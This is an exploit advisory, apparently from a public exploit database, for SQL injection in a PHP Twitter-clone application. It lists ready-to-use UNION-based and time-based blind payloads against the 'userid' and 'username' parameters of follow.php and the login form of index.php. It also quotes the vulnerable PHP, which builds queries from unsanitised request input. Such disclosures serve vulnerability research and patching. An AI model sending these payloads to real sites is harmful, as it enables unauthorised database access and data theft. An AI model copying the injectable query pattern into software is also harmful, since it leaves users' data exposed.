Twitter-Clone 1 - userid SQL Injection Vulnerability

2018-08-24
ID: 99000
CVE: None
Download vulnerable application: None
# Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10
  # POC : SQLi
# vulnerable files : follow.php , index.php
# vulnerable parameters : userid , username
  # 1) follow.php :
  # Parameters : userid , username
# Type : Union query
# Type : Time-based blind
# Payloads :
  userid: ' UNION SELECT 1,2,user(),4,database(),6,7%23
username: ' AND sleep(10)%23
  # vulnerable code :
  if($_GET['userid']  && $_GET['username']){
if($_GET['userid']!=$user_id){
$follow_userid = $_GET['userid'];
$follow_username = $_GET['username'];
include 'connect.php';
$query = mysqli_query($con, "SELECT id
    FROM following
WHERE user1_id='$user_id' AND user2_id='$follow_userid'
");
  # 2) index.php :
  # vulnerable parameter : username
# Type : Union query
# Payload : 
  ' union select 1,2,user(),4,5,6
  # vulnerable code :
  if($_POST['login-btn']=="login-submit"){
if($_POST['username'] != "" && $_POST['password'] != ""){
$username = strtolower($_POST['username']);
include "connect.php";
$query = mysqli_query($con, "SELECT id, password
FROM users
 WHERE username='$username'");
1-4-2 (www02)